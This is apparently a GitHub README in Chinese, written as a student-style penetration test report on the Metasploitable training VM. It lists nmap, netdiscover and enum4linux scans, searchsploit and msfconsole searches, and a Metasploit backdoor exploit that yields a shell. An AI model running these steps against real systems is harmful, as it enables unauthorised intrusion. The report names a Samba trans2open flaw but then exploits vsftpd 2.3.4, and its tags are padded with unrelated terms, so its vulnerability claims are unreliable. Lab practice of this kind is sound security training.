sudo-mugerwa/Metasploitable
GitHub: sudo-mugerwa/Metasploitable
Stars: 0 | Forks: 0
# Metasploitable
Metasploitable 虚拟机 - 一份涵盖枚举、漏洞分析和利用的详细渗透测试报告。
## 📋 目录
1. [枚举](#1-enumeration)
2. [漏洞分析](#2-vulnerability-analysis)
3. [漏洞利用](#3-exploitation)
## 1. 枚举
在此阶段,我识别了目标并扫描了开放的服务。
### 网络发现
我使用 `ip addr show` 识别了我的 IP,然后使用 `netdiscover` 在本地 NAT 网络上找到了目标 IP。
* **命令:** `ip addr show ` 192.168.2.4
* **命令:** `sudo netdiscover -r 192.168.2.4/24`
* **证据:** [查看 IP 地址](https://github.com/user-attachments/assets/5f447afc-fa0a-4e11-bf17-49d9030fe24c)
* **证据:** [查看设备](https://github.com/user-attachments/assets/90c40bcc-63eb-4c22-9a69-5a8b9bb54d51)
### 端口扫描
一次强力的 Nmap 扫描揭示了几个有趣的端口,包括 80 (HTTP) 和 139/445 (SMB)。
* **命令:** `enum4linux 192.168.2.13`
* **命令:** `nmap -A -p- 192.168.2.13`
* **证据:** [查看枚举结果](https://github.com/user-attachments/assets/25f4874a-ae69-41ac-af15-963f2eb71219)
* **证据:** [查看 Nmap 扫描](https://github.com/user-attachments/assets/0010925a-033e-4e61-8bc2-760cd8bc2fa4)
## 2. 漏洞分析
我发现了一个过时的 **Samba (2.2.1)** 版本,它容易受到 "trans2open" 溢出攻击。
* **命令:** Searchsploit Vsftpd 2.3.4
* **命令:** Load msfconsole & serach Vsftpd 2.3
* **证据:** [查看 Searchsploit](https://github.com/user-attachments/assets/bdeeb27f-17ad-4670-8196-d935e61e2f84)
* **证据:** [查看 msfconsole 搜索](https://github.com/user-attachments/assets/ed58c17e-0022-472b-b19e-f7f678fc5e3c)
## 3. 漏洞利用
然后我设置了响应主机(RHOST)、监听主机(LHOST),加载了 payload,随后执行 Run(exploit)
* **命令:** `use 0 (select backdoor exploit) `
* **命令:** `set RHOSTS 192.168.2.13`
* **命令:** `exploit`
* **命令:** `ip addr show`
* **证据:** [查看后门](https://github.com/user-attachments/assets/947c721b-989d-4e65-8408-1f129e6a7ed7)
* **证据:** [查看 RHOSTS](https://github.com/user-attachments/assets/4f641558-b0a7-4a82-b471-d068c6082cba)
* **证据:** [查看 Exploit](https://github.com/user-attachments/assets/456947ef-285a-4bc9-aad5-af2fd3ff82e9)
* **证据:** [获得的 Shell](https://github.com/user-attachments/assets/d1805912-3097-4605-80c7-5d089deab579)
标签:Backdoor, CTI, Metasploitable, Nmap, OPA, PE 加载器, Samba漏洞, VSFTPD, Web报告查看器, 协议分析, 密码管理, 插件系统, 数据展示, 数据统计, 权限提升, 枚举, 渗透测试报告, 漏洞分析, 端口扫描, 红队, 缓冲区溢出, 编程工具, 网络安全, 虚拟驱动器, 路径探测, 远程代码执行, 隐私保护, 靶场